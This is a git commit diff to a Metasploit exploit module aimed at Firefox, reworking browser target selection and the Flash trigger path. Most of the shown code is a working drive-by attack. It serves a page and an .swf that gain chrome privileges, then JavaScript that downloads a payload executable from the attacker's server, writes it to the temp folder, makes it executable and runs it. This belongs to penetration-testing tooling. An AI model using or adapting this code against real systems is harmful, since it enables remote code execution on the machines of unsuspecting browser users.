Fix target selection probs, and swf path

unstable
sinn3r 2013-05-22 14:34:00 -05:00
parent aae4768563
commit 0e6576747a
1 changed files with 52 additions and 39 deletions


@ -33,8 +33,12 @@ class Metasploit3 < Msf::Exploit::Remote
with script access should be able to trigger it. with script access should be able to trigger it.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Targets' => [ 'Platform' => 'win',
[ 'Windows x86 (Native Payload)', 'Targets' =>
[
[ 'Automatic', {} ],
[
'Windows x86 (Native Payload)',
{ {
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86 'Arch' => ARCH_X86
@ -78,12 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
if target != get_target(request.headers['User-Agent']) my_target = get_target(request.headers['User-Agent'])
print_status("User agent does not match an available payload type, bailing.") if my_target.nil?
print_error("User agent does not match an available payload type, bailing.")
send_not_found(cli) send_not_found(cli)
return return
end end
target = my_target
print_status(target.name)
if request.uri =~ /\.swf$/ if request.uri =~ /\.swf$/
# send Flash .swf for navigating the frame to chrome:// # send Flash .swf for navigating the frame to chrome://
print_status("Sending .swf trigger.") print_status("Sending .swf trigger.")
@ -94,33 +102,38 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' }) send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
else else
# send initial HTML page # send initial HTML page
print_status("Target selected: #{target.name}")
print_status("Sending #{self.name}") print_status("Sending #{self.name}")
send_response_html(cli, generate_html) send_response_html(cli, generate_html(target))
end end
handler(cli) handler(cli)
end end
# @return [String] the encoded executable for dropping onto the client's machine # @return [String] the encoded executable for dropping onto the client's machine
def dropped_file_contents(cli) def dropped_file_contents(cli)
regenerate_payload(cli).encoded_exe() return if ((p=regenerate_payload(cli)) == nil)
generate_payload_exe( {:code=>p.encoded} )
end end
# @return [Msf::Module::Target] that matches the client's user-agent header # @return [Msf::Module::Target] that matches the client's user-agent header
def get_target(agent) def get_target(agent)
# browser detection # Not firefox, bail
if agent !~ /firefox/i if agent !~ /firefox/i
return nil return nil
end end
# User wants to manually specify a target, respect that
if target != targets[0]
return target
end
# os detection # os detection
if agent =~ /windows/i if agent =~ /windows/i
print_status 'Windows detected.'
targets[0]
elsif agent =~ /linux/i
print_status 'Linux detected.'
targets[1] targets[1]
elsif agent =~ /macintosh/i and agent =~ /intel/i elsif agent =~ /linux/i
print_status 'OSX detected.'
targets[2] targets[2]
elsif agent =~ /macintosh/i and agent =~ /intel/i
targets[3]
else else
nil nil
end end
@ -133,8 +146,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# @return [String] the filename that will be used when the payload is dropped # @return [String] the filename that will be used when the payload is dropped
def payload_filename def payload_filename(target)
if target.name == 'Windows x86 (Native Payload)' if target.name =~ /Windows x86/i
"#{Rex::Text.rand_text_alphanumeric(8)}.exe" "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
else else
"#{Rex::Text.rand_text_alphanumeric(8)}.bin" "#{Rex::Text.rand_text_alphanumeric(8)}.bin"
@ -142,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# @return [String] containing javascript code to execute with chrome privileges # @return [String] containing javascript code to execute with chrome privileges
def js_payload def js_payload(target)
%Q| %Q|
#{js_debug("Injection successful. JS executing with chrome privileges.")} #{js_debug("Injection successful. JS executing with chrome privileges.")}
var x = new XMLHttpRequest; var x = new XMLHttpRequest;
@ -153,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
var file = Components.classes["@mozilla.org/file/directory_service;1"] var file = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties) .getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile); .get("TmpD", Components.interfaces.nsIFile);
file.append('#{payload_filename}'); file.append('#{payload_filename(target)}');
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"] var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
.createInstance(Components.interfaces.nsIFileOutputStream); .createInstance(Components.interfaces.nsIFileOutputStream);
stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0); stream.init(file, 0x04 \| 0x08 \| 0x20, 0666, 0);
@ -163,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
} else { } else {
stream.close(); stream.close();
} }
#{chmod_code} #{chmod_code(target)}
#{js_debug("'Downloaded to: '+file.path", "")} #{js_debug("'Downloaded to: '+file.path", "")}
var process = Components.classes["@mozilla.org/process/util;1"] var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess); .createInstance(Components.interfaces.nsIProcess);
@ -179,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# @return [String] containing javascript that will chmod the dropped executable # @return [String] containing javascript that will chmod the dropped executable
def chmod_code def chmod_code(target)
return '' if target.name == 'Windows x86 (Native Payload)' return '' if target.name == 'Windows x86 (Native Payload)'
%Q| %Q|
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
@ -194,15 +207,15 @@ class Metasploit3 < Msf::Exploit::Remote
def base_url def base_url
proto = (datastore["SSL"] ? "https" : "http") proto = (datastore["SSL"] ? "https" : "http")
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}" "#{proto}://#{myhost}:#{datastore['SRVPORT']}#{get_resource}"
end end
# @return [String] HTML that is sent in the first response to the client # @return [String] HTML that is sent in the first response to the client
def generate_html def generate_html(target)
vars = { vars = {
:symbol_id => 'a', :symbol_id => 'a',
:random_domain => 'safe', :random_domain => 'safe',
:payload => js_payload, :payload => js_payload(target),
:payload_var => 'c', :payload_var => 'c',
:payload_key => 'k', :payload_key => 'k',
:payload_obj_var => 'payload_obj', :payload_obj_var => 'payload_obj',